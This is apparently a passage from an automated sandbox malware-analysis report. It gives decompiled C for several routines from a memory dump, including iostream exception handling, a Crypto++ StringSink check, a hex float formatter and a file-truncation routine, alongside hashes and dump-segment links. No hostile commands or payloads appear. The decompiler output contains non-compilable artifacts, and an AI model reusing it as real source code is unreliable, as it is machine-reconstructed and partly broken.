                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3
                    • String ID: MGF1$OAEP-$SHA-1
                    • API String ID: 431132790-81113173
                    • Opcode ID: c441ef7139a0621de4cb4639baf8c90f745f622baf39a3c0a0b489924ee7889f
                    • Instruction ID: 85fa0d52a2439fe24c48f597e04e7563d1217aac1a0769573b4d854fb1bdd5d1
                    • Opcode Fuzzy Hash: c441ef7139a0621de4cb4639baf8c90f745f622baf39a3c0a0b489924ee7889f
                    • Instruction Fuzzy Hash: AD11397094025AEADB10F7A9CC1AEEE7B38EF21B15F50400EE500B7296CAB14A44C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 40%
                    			E013C6548(void* __ecx, void* __edx, signed int _a4, char _a8) {
                    				char _v24;
                    				signed int _t15;
                    				signed int _t17;
                    				signed int _t18;
                    				void* _t21;
                    				signed char _t26;
                    				void* _t31;
                    				void* _t35;
                    				signed char _t38;
                    
                    				_t31 = __edx;
                    				_t15 = _a4 & 0x00000017;
                    				 *(__ecx + 0xc) = _t15;
                    				_t26 =  *(__ecx + 0x10) & _t15;
                    				if(_t26 == 0) {
                    					return _t15;
                    				} else {
                    					if(_a8 != 0) {
                    						_push(0);
                    						_push(0);
                    					} else {
                    						_t48 = _t26 & 0x00000004;
                    						if((_t26 & 0x00000004) == 0) {
                    							__eflags = _t26 & 0x00000002;
                    							if((_t26 & 0x00000002) == 0) {
                    								_t21 = E013C2243();
                    								_push("ios_base::eofbit set");
                    							} else {
                    								_t21 = E013C2243();
                    								_push("ios_base::failbit set");
                    							}
                    						} else {
                    							_t21 = E013C2243();
                    							_push("ios_base::badbit set");
                    						}
                    						_push(_t21);
                    						_push(1);
                    						_t26 =  &_v24;
                    						E013C387D(_t26, _t48);
                    						_push(0x1430a04);
                    						_v24 = 0x141a920;
                    						_push( &_v24);
                    					}
                    					E013F4EC6();
                    					asm("int3");
                    					_t38 = _t26;
                    					if( *((intOrPtr*)(_t38 + 0x4c)) != 0) {
                    						_t17 = E013C5A78(_t26, _t31);
                    						_push( *((intOrPtr*)(_t38 + 0x4c)));
                    						__eflags = _t17;
                    						_t34 =  ==  ? 0 : _t38; // executed
                    						_t18 = E013FDD5A(0); // executed
                    						__eflags = _t18;
                    						_t35 =  !=  ? 0 :  ==  ? 0 : _t38;
                    					} else {
                    						_t35 = 0;
                    					}
                    					E013C5CF0(_t38, 0, 2);
                    					return _t35;
                    				}
                    			}












                    0x013c6548
                    0x013c6551
                    0x013c6554
                    0x013c655a
                    0x013c655c
                    0x013c65b0
                    0x013c655e
                    0x013c6562
                    0x013c65b3
                    0x013c65b5
                    0x013c6564
                    0x013c6564
                    0x013c6567
                    0x013c6590
                    0x013c6593
                    0x013c65a1
                    0x013c65a6
                    0x013c6595
                    0x013c6595
                    0x013c659a
                    0x013c659a
                    0x013c6569
                    0x013c6569
                    0x013c656e
                    0x013c656e
                    0x013c6573
                    0x013c6574
                    0x013c6576
                    0x013c6579
                    0x013c657e
                    0x013c6586
                    0x013c658d
                    0x013c658d
                    0x013c65b7
                    0x013c65bc
                    0x013c65be
                    0x013c65c5
                    0x013c65cb
                    0x013c65d0
                    0x013c65d7
                    0x013c65d9
                    0x013c65dc
                    0x013c65e4
                    0x013c65e6
                    0x013c65c7
                    0x013c65c7
                    0x013c65c7
                    0x013c65ef
                    0x013c65f8
                    0x013c65f8

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C65B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 0a921913b74e97e25ed40fd4344fe694e8de180f504a7ffc0f75c23d8c974c82
                    • Instruction ID: 0bf5c31c33b02a71e81e075f61cd0645da7dc85d9c449174883c8354866526ee
                    • Opcode Fuzzy Hash: 0a921913b74e97e25ed40fd4344fe694e8de180f504a7ffc0f75c23d8c974c82
                    • Instruction Fuzzy Hash: 01F0FCF095430DAADB10FA5CC903F7E37A55F30E1CF34440DA70166665EA716E84C762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E013C4DE1(void* __ecx) {
                    				void* _t20;
                    				void* _t26;
                    
                    				_t20 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_push(_t20 + 0xc);
                    				_push(0x1435fe0);
                    				_push("OutputStringPointer");
                    				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 8)))) + 4))() == 0) {
                    					E013C2AD0(_t26 - 0x24, "StringSink: OutputStringPointer not specified");
                    					 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                    					_push(_t26 - 0x24);
                    					_push(1);
                    					E013C2E51(_t26 - 0x4c);
                    					 *((intOrPtr*)(_t26 - 0x4c)) = 0x141a97c;
                    					_t14 = E013F4EC6(_t26 - 0x4c, 0x1430adc);
                    				}
                    				return E013F269C(_t14);
                    			}





                    0x013c4de1
                    0x013c4de1
                    0x013c4de8
                    0x013c4df3
                    0x013c4df4
                    0x013c4df9
                    0x013c4e07
                    0x013c4e11
                    0x013c4e16
                    0x013c4e1d
                    0x013c4e1e
                    0x013c4e23
                    0x013c4e30
                    0x013c4e38
                    0x013c4e38
                    0x013c4e42

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C4DE8
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C4E38
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • OutputStringPointer, xrefs: 013C4DF9
                    • StringSink: OutputStringPointer not specified, xrefs: 013C4E09
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                    • API String ID: 1412866469-1331214609
                    • Opcode ID: 91dbacd041d566472c4ba37d2b5e994ea34d33f523b33f69c25b30e543b7eee1
                    • Instruction ID: 4376ba358ae4e09fb821611c4f07b344e0d9044c6e01eeb65cec214ca9cb75ab
                    • Opcode Fuzzy Hash: 91dbacd041d566472c4ba37d2b5e994ea34d33f523b33f69c25b30e543b7eee1
                    • Instruction Fuzzy Hash: CBF0B475A402099FCB00FBA5C851FEFB378EF64B18F50841DA60477150CBB09D06CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0140A947(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				unsigned int _v20;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				char _v40;
                    				intOrPtr _v48;
                    				char _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t86;
                    				signed int _t92;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				void* _t101;
                    				void* _t102;
                    				void* _t104;
                    				void* _t107;
                    				void* _t109;
                    				void* _t111;
                    				void* _t115;
                    				char* _t116;
                    				void* _t119;
                    				signed int _t121;
                    				signed int _t128;
                    				signed int* _t129;
                    				signed int _t136;
                    				signed int _t137;
                    				char _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				signed int _t146;
                    				signed int _t151;
                    				char _t156;
                    				char _t157;
                    				void* _t161;
                    				unsigned int _t162;
                    				signed int _t164;
                    				signed int _t166;
                    				signed int _t170;
                    				void* _t171;
                    				signed int* _t172;
                    				signed int _t174;
                    				signed int _t181;
                    				signed int _t182;
                    				signed int _t183;
                    				signed int _t184;
                    				signed int _t185;
                    				signed int _t186;
                    				signed int _t187;
                    
                    				_t171 = __edx;
                    				_t181 = _a24;
                    				if(_t181 < 0) {
                    					_t181 = 0;
                    				}
                    				_t184 = _a8;
                    				 *_t184 = 0;
                    				E013FEF21(0,  &_v52, _t171, _a36);
                    				_t5 = _t181 + 0xb; // 0xb
                    				if(_a12 > _t5) {
                    					_t172 = _a4;
                    					_t142 = _t172[1];
                    					_v36 =  *_t172;
                    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                    						L11:
                    						__eflags = _t142 & 0x80000000;
                    						if((_t142 & 0x80000000) != 0) {
                    							 *_t184 = 0x2d;
                    							_t184 = _t184 + 1;
                    							__eflags = _t184;
                    						}
                    						__eflags = _a28;
                    						_v16 = 0x3ff;
                    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                    						__eflags = _t172[1] & 0x7ff00000;
                    						_v32 = _t136;
                    						_t86 = 0x30;
                    						if((_t172[1] & 0x7ff00000) != 0) {
                    							 *_t184 = 0x31;
                    							_t185 = _t184 + 1;
                    							__eflags = _t185;
                    						} else {
                    							 *_t184 = _t86;
                    							_t185 = _t184 + 1;
                    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                    							__eflags = _t164;
                    							if(_t164 != 0) {
                    								_v16 = 0x3fe;
                    							} else {
                    								_v16 = _v16 & _t164;
                    							}
                    						}
                    						_t146 = _t185;
                    						_t186 = _t185 + 1;
                    						_v28 = _t146;
                    						__eflags = _t181;
                    						if(_t181 != 0) {
                    							_t30 = _v48 + 0x88; // 0xffce8305
                    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                    						} else {
                    							 *_t146 = 0;
                    						}
                    						_t92 = _t172[1] & 0x000fffff;
                    						__eflags = _t92;
                    						_v20 = _t92;
                    						if(_t92 > 0) {
                    							L23:
                    							_t33 =  &_v8;
                    							 *_t33 = _v8 & 0x00000000;
                    							__eflags =  *_t33;
                    							_t147 = 0xf0000;
                    							_t93 = 0x30;
                    							_v12 = _t93;
                    							_v20 = 0xf0000;
                    							do {
                    								__eflags = _t181;
                    								if(_t181 <= 0) {
                    									break;
                    								}
                    								_t119 = E013F3290( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    								_t161 = 0x30;
                    								_t121 = _t119 + _t161 & 0x0000ffff;
                    								__eflags = _t121 - 0x39;
                    								if(_t121 > 0x39) {
                    									_t121 = _t121 + _t136;
                    									__eflags = _t121;
                    								}
                    								_t162 = _v20;
                    								_t172 = _a4;
                    								 *_t186 = _t121;
                    								_t186 = _t186 + 1;
                    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                    								_t147 = _t162 >> 4;
                    								_t93 = _v12 - 4;
                    								_t181 = _t181 - 1;
                    								_v20 = _t162 >> 4;
                    								_v12 = _t93;
                    								__eflags = _t93;
                    							} while (_t93 >= 0);
                    							__eflags = _t93;
                    							if(_t93 < 0) {
                    								goto L39;
                    							}
                    							_t115 = E013F3290( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    							__eflags = _t115 - 8;
                    							if(_t115 <= 8) {
                    								goto L39;
                    							}
                    							_t54 = _t186 - 1; // 0x13fcad8
                    							_t116 = _t54;
                    							_t138 = 0x30;
                    							while(1) {
                    								_t156 =  *_t116;
                    								__eflags = _t156 - 0x66;
                    								if(_t156 == 0x66) {
                    									goto L33;
                    								}
                    								__eflags = _t156 - 0x46;
                    								if(_t156 != 0x46) {
                    									_t139 = _v32;
                    									__eflags = _t116 - _v28;
                    									if(_t116 == _v28) {
                    										_t57 = _t116 - 1;
                    										 *_t57 =  *(_t116 - 1) + 1;
                    										__eflags =  *_t57;
                    									} else {
                    										_t157 =  *_t116;
                    										__eflags = _t157 - 0x39;
                    										if(_t157 != 0x39) {
                    											 *_t116 = _t157 + 1;
                    										} else {
                    											 *_t116 = _t139 + 0x3a;
                    										}
                    									}
                    									goto L39;
                    								}
                    								L33:
                    								 *_t116 = _t138;
                    								_t116 = _t116 - 1;
                    							}
                    						} else {
                    							__eflags =  *_t172;
                    							if( *_t172 <= 0) {
                    								L39:
                    								__eflags = _t181;
                    								if(_t181 > 0) {
                    									_push(_t181);
                    									_t111 = 0x30;
                    									_push(_t111);
                    									_push(_t186);
                    									E013F5890(_t181);
                    									_t186 = _t186 + _t181;
                    									__eflags = _t186;
                    								}
                    								_t94 = _v28;
                    								__eflags =  *_t94;
                    								if( *_t94 == 0) {
                    									_t186 = _t94;
                    								}
                    								__eflags = _a28;
                    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								_t174 = _a4[1];
                    								_t100 = E013F3290( *_a4, 0x34, _t174);
                    								_t137 = 0;
                    								_t151 = (_t100 & 0x000007ff) - _v16;
                    								__eflags = _t151;
                    								asm("sbb ebx, ebx");
                    								if(__eflags < 0) {
                    									L47:
                    									 *(_t186 + 1) = 0x2d;
                    									_t187 = _t186 + 2;
                    									__eflags = _t187;
                    									_t151 =  ~_t151;
                    									asm("adc ebx, 0x0");
                    									_t137 =  ~_t137;
                    									goto L48;
                    								} else {
                    									if(__eflags > 0) {
                    										L46:
                    										 *(_t186 + 1) = 0x2b;
                    										_t187 = _t186 + 2;
                    										L48:
                    										_t182 = _t187;
                    										_t101 = 0x30;
                    										 *_t187 = _t101;
                    										__eflags = _t137;
                    										if(__eflags < 0) {
                    											L56:
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L60:
                    												_push(0);
                    												_push(0xa);
                    												_push(_t137);
                    												_push(_t151);
                    												_t102 = E01415060();
                    												_v32 = _t174;
                    												 *_t187 = _t102 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												L61:
                    												_t104 = 0x30;
                    												_t183 = 0;
                    												__eflags = 0;
                    												 *_t187 = _t151 + _t104;
                    												 *(_t187 + 1) = 0;
                    												goto L62;
                    											}
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L61;
                    											}
                    											if(__eflags > 0) {
                    												goto L60;
                    											}
                    											__eflags = _t151 - 0xa;
                    											if(_t151 < 0xa) {
                    												goto L61;
                    											}
                    											goto L60;
                    										}
                    										if(__eflags > 0) {
                    											L51:
                    											_push(0);
                    											_push(0x3e8);
                    											_push(_t137);
                    											_push(_t151);
                    											_t107 = E01415060();
                    											_v32 = _t174;
                    											 *_t187 = _t107 + 0x30;
                    											_t187 = _t187 + 1;
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L55:
                    												_push(0);
                    												_push(0x64);
                    												_push(_t137);
                    												_push(_t151);
                    												_t109 = E01415060();
                    												_v32 = _t174;
                    												 *_t187 = _t109 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												goto L56;
                    											}
                    											L52:
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L56;
                    											}
                    											if(__eflags > 0) {
                    												goto L55;
                    											}
                    											__eflags = _t151 - 0x64;
                    											if(_t151 < 0x64) {
                    												goto L56;
                    											}
                    											goto L55;
                    										}
                    										__eflags = _t151 - 0x3e8;
                    										if(_t151 < 0x3e8) {
                    											goto L52;
                    										}
                    										goto L51;
                    									}
                    									__eflags = _t151;
                    									if(_t151 < 0) {
                    										goto L47;
                    									}
                    									goto L46;
                    								}
                    							}
                    							goto L23;
                    						}
                    					}
                    					__eflags = 0;
                    					if(0 != 0) {
                    						goto L11;
                    					} else {
                    						_t183 = E0140AC4A(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                    						__eflags = _t183;
                    						if(_t183 == 0) {
                    							_t128 = E013F59F0(_t184, 0x65);
                    							_pop(_t166);
                    							__eflags = _t128;
                    							if(_t128 != 0) {
                    								__eflags = _a28;
                    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								__eflags = _t170;
                    								 *_t128 = _t170;
                    								 *((char*)(_t128 + 3)) = 0;
                    							}
                    							_t183 = 0;
                    						} else {
                    							 *_t184 = 0;
                    						}
                    						goto L62;
                    					}
                    				} else {
                    					_t129 = E013FDB3A();
                    					_t183 = 0x22;
                    					 *_t129 = _t183;
                    					E013FDA61();
                    					L62:
                    					if(_v40 != 0) {
                    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                    					}
                    					return _t183;
                    				}
                    			}
























































                    0x0140a947
                    0x0140a952
                    0x0140a959
                    0x0140a95b
                    0x0140a95b
                    0x0140a95d
                    0x0140a966
                    0x0140a968
                    0x0140a96d
                    0x0140a973
                    0x0140a989
                    0x0140a98e
                    0x0140a991
                    0x0140a99e
                    0x0140a9a3
                    0x0140a9f7
                    0x0140a9ff
                    0x0140aa01
                    0x0140aa03
                    0x0140aa06
                    0x0140aa06
                    0x0140aa06
                    0x0140aa0c
                    0x0140aa14
                    0x0140aa27
                    0x0140aa2a
                    0x0140aa2c
                    0x0140aa2f
                    0x0140aa30
                    0x0140aa51
                    0x0140aa54
                    0x0140aa54
                    0x0140aa32
                    0x0140aa32
                    0x0140aa34
                    0x0140aa3f
                    0x0140aa3f
                    0x0140aa41
                    0x0140aa48
                    0x0140aa43
                    0x0140aa43
                    0x0140aa43
                    0x0140aa41
                    0x0140aa55
                    0x0140aa57
                    0x0140aa58
                    0x0140aa5b
                    0x0140aa5d
                    0x0140aa67
                    0x0140aa71
                    0x0140aa5f
                    0x0140aa5f
                    0x0140aa5f
                    0x0140aa76
                    0x0140aa76
                    0x0140aa7b
                    0x0140aa7e
                    0x0140aa89
                    0x0140aa89
                    0x0140aa89
                    0x0140aa89
                    0x0140aa8d
                    0x0140aa94
                    0x0140aa95
                    0x0140aa98
                    0x0140aa9b
                    0x0140aa9b
                    0x0140aa9d
                    0x00000000
                    0x00000000
                    0x0140aab5
                    0x0140aabc
                    0x0140aac0
                    0x0140aac3
                    0x0140aac6
                    0x0140aac8
                    0x0140aac8
                    0x0140aac8
                    0x0140aaca
                    0x0140aacd
                    0x0140aad0
                    0x0140aad2
                    0x0140aada
                    0x0140aae0
                    0x0140aae3
                    0x0140aae6
                    0x0140aae7
                    0x0140aaea
                    0x0140aaed
                    0x0140aaed
                    0x0140aaf2
                    0x0140aaf5
                    0x00000000
                    0x00000000
                    0x0140ab0d
                    0x0140ab12
                    0x0140ab16
                    0x00000000
                    0x00000000
                    0x0140ab1a
                    0x0140ab1a
                    0x0140ab1d
                    0x0140ab1e
                    0x0140ab1e
                    0x0140ab20
                    0x0140ab23
                    0x00000000
                    0x00000000
                    0x0140ab25
                    0x0140ab28
                    0x0140ab2f
                    0x0140ab32
                    0x0140ab35
                    0x0140ab4b
                    0x0140ab4b
                    0x0140ab4b
                    0x0140ab37
                    0x0140ab37
                    0x0140ab39
                    0x0140ab3c
                    0x0140ab47
                    0x0140ab3e
                    0x0140ab41
                    0x0140ab41
                    0x0140ab3c
                    0x00000000
                    0x0140ab35
                    0x0140ab2a
                    0x0140ab2a
                    0x0140ab2c
                    0x0140ab2c
                    0x0140aa80
                    0x0140aa80
                    0x0140aa83
                    0x0140ab4e
                    0x0140ab4e
                    0x0140ab50
                    0x0140ab52
                    0x0140ab55
                    0x0140ab56
                    0x0140ab57
                    0x0140ab58
                    0x0140ab60
                    0x0140ab60
                    0x0140ab60
                    0x0140ab62
                    0x0140ab65
                    0x0140ab68
                    0x0140ab6a
                    0x0140ab6a
                    0x0140ab6c
                    0x0140ab7e
                    0x0140ab82
                    0x0140ab85
                    0x0140ab8c
                    0x0140ab94
                    0x0140ab94
                    0x0140ab97
                    0x0140ab99
                    0x0140abaa
                    0x0140abaa
                    0x0140abae
                    0x0140abae
                    0x0140abb1
                    0x0140abb3
                    0x0140abb6
                    0x00000000
                    0x0140ab9b
                    0x0140ab9b
                    0x0140aba1
                    0x0140aba1
                    0x0140aba5
                    0x0140abb8
                    0x0140abb8
                    0x0140abbc
                    0x0140abbd
                    0x0140abbf
                    0x0140abc1
                    0x0140ac02
                    0x0140ac02
                    0x0140ac04
                    0x0140ac11
                    0x0140ac11
                    0x0140ac13
                    0x0140ac15
                    0x0140ac16
                    0x0140ac17
                    0x0140ac1e
                    0x0140ac21
                    0x0140ac23
                    0x0140ac23
                    0x0140ac24
                    0x0140ac26
                    0x0140ac29
                    0x0140ac29
                    0x0140ac2b
                    0x0140ac2d
                    0x00000000
                    0x0140ac2d
                    0x0140ac06
                    0x0140ac08
                    0x00000000
                    0x00000000
                    0x0140ac0a
                    0x00000000
                    0x00000000
                    0x0140ac0c
                    0x0140ac0f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140ac0f
                    0x0140abc8
                    0x0140abce
                    0x0140abce
                    0x0140abd0
                    0x0140abd1
                    0x0140abd2
                    0x0140abd3
                    0x0140abda
                    0x0140abdd
                    0x0140abdf
                    0x0140abe0
                    0x0140abe2
                    0x0140abef
                    0x0140abef
                    0x0140abf1
                    0x0140abf3
                    0x0140abf4
                    0x0140abf5
                    0x0140abfc
                    0x0140abff
                    0x0140ac01
                    0x0140ac01
                    0x00000000
                    0x0140ac01
                    0x0140abe4
                    0x0140abe4
                    0x0140abe6
                    0x00000000
                    0x00000000
                    0x0140abe8
                    0x00000000
                    0x00000000
                    0x0140abea
                    0x0140abed
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140abed
                    0x0140abca
                    0x0140abcc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140abcc
                    0x0140ab9d
                    0x0140ab9f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140ab9f
                    0x0140ab99
                    0x00000000
                    0x0140aa83
                    0x0140aa7e
                    0x0140a9a5
                    0x0140a9a7
                    0x00000000
                    0x0140a9a9
                    0x0140a9bf
                    0x0140a9c4
                    0x0140a9c6
                    0x0140a9d2
                    0x0140a9d8
                    0x0140a9d9
                    0x0140a9db
                    0x0140a9dd
                    0x0140a9e8
                    0x0140a9e8
                    0x0140a9eb
                    0x0140a9ed
                    0x0140a9ed
                    0x0140a9f0
                    0x0140a9c8
                    0x0140a9c8
                    0x0140a9c8
                    0x00000000
                    0x0140a9c6
                    0x0140a975
                    0x0140a975
                    0x0140a97c
                    0x0140a97d
                    0x0140a97f
                    0x0140ac31
                    0x0140ac35
                    0x0140ac3a
                    0x0140ac3a
                    0x0140ac49
                    0x0140ac49

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 91b9d6a16835b6585cd0a3a2808c0cb2a76c79bd5e3c41219ca0544d7f7ba4fa
                    • Instruction ID: 24373014128119aaaa2643f59ff4258f00e6c680c48c181c7efc99a10e8ebe98
                    • Opcode Fuzzy Hash: 91b9d6a16835b6585cd0a3a2808c0cb2a76c79bd5e3c41219ca0544d7f7ba4fa
                    • Instruction Fuzzy Hash: F3A14772A047469FE727CF6AC8907AEBFA5EF61310F28457ED6859B3E1C2388941C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E014143C1(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                    				int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _t16;
                    				signed int _t17;
                    				int _t20;
                    				signed int _t21;
                    				int _t23;
                    				signed int _t25;
                    				int _t28;
                    				intOrPtr* _t30;
                    				int _t34;
                    				int _t35;
                    				void* _t36;
                    				intOrPtr* _t37;
                    				intOrPtr* _t38;
                    				int _t46;
                    				void* _t54;
                    				void* _t56;
                    				signed int _t58;
                    				int _t61;
                    				int _t63;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    
                    				_t58 = __edx;
                    				_t59 = _a4;
                    				_t61 = 0;
                    				_t16 = E01408E19(_a4, 0, 0, 1);
                    				_v20 = _t16;
                    				_v16 = __edx;
                    				_t65 = _t64 + 0x10;
                    				if((_t16 & __edx) != 0xffffffff) {
                    					_t17 = E01408E19(_t59, 0, 0, 2);
                    					_t66 = _t65 + 0x10;
                    					_t51 = _t17 & __edx;
                    					__eflags = (_t17 & __edx) - 0xffffffff;
                    					if((_t17 & __edx) == 0xffffffff) {
                    						goto L1;
                    					}
                    					_t46 = _a8 - _t17;
                    					__eflags = _t46;
                    					_t20 = _a12;
                    					asm("sbb eax, edx");
                    					_v8 = _t20;
                    					if(__eflags < 0) {
                    						L24:
                    						__eflags = _t20 - _t61;
                    						if(__eflags > 0) {
                    							L19:
                    							_t21 = E01408E19(_t59, _v20, _v16, _t61);
                    							__eflags = (_t21 & _t58) - 0xffffffff;
                    							if((_t21 & _t58) != 0xffffffff) {
                    								_t23 = 0;
                    								__eflags = 0;
                    								L31:
                    								return _t23;
                    							}
                    							L20:
                    							_t23 =  *((intOrPtr*)(E013FDB3A()));
                    							goto L31;
                    						}
                    						if(__eflags < 0) {
                    							L27:
                    							_t25 = E01408E19(_t59, _a8, _a12, _t61);
                    							_t66 = _t66 + 0x10;
                    							__eflags = (_t25 & _t58) - 0xffffffff;
                    							if((_t25 & _t58) == 0xffffffff) {
                    								goto L20;
                    							}
                    							_t28 = SetEndOfFile(E0140DD90(_t59));
                    							__eflags = _t28;
                    							if(_t28 != 0) {
                    								goto L19;
                    							}
                    							 *((intOrPtr*)(E013FDB3A())) = 0xd;
                    							_t30 = E013FDB27();
                    							 *_t30 = GetLastError();
                    							goto L20;
                    						}
                    						__eflags = _t46 - _t61;
                    						if(_t46 >= _t61) {
                    							goto L19;
                    						}
                    						goto L27;
                    					}
                    					if(__eflags > 0) {
                    						L6:
                    						_t63 = E014009B2(_t51, 0x1000, 1);
                    						_pop(_t54);
                    						__eflags = _t63;
                    						if(_t63 != 0) {
                    							_v12 = E01404945(_t54, _t59, 0x8000);
                    							_t34 = _v8;
                    							_pop(_t56);
                    							do {
                    								__eflags = _t34;
                    								if(__eflags < 0) {
                    									L13:
                    									_t35 = _t46;
                    									L14:
                    									_t36 = E014081B5(_t59, _t63, _t35);
                    									_t66 = _t66 + 0xc;
                    									__eflags = _t36 - 0xffffffff;
                    									if(_t36 == 0xffffffff) {
                    										_t37 = E013FDB27();
                    										__eflags =  *_t37 - 5;
                    										if( *_t37 == 5) {
                    											 *((intOrPtr*)(E013FDB3A())) = 0xd;
                    										}
                    										L23:
                    										_t38 = E013FDB3A();
                    										E014012E1(_t63);
                    										_t23 =  *_t38;
                    										goto L31;
                    									}
                    									asm("cdq");
                    									_t46 = _t46 - _t36;
                    									_t34 = _v8;
                    									asm("sbb eax, edx");
                    									_v8 = _t34;
                    									__eflags = _t34;
                    									if(__eflags > 0) {
                    										L12:
                    										_t35 = 0x1000;
                    										goto L14;
                    									}
                    									if(__eflags < 0) {
                    										break;
                    									}
                    									goto L17;
                    								}
                    								if(__eflags > 0) {
                    									goto L12;
                    								}
                    								__eflags = _t46 - 0x1000;
                    								if(_t46 < 0x1000) {
                    									goto L13;
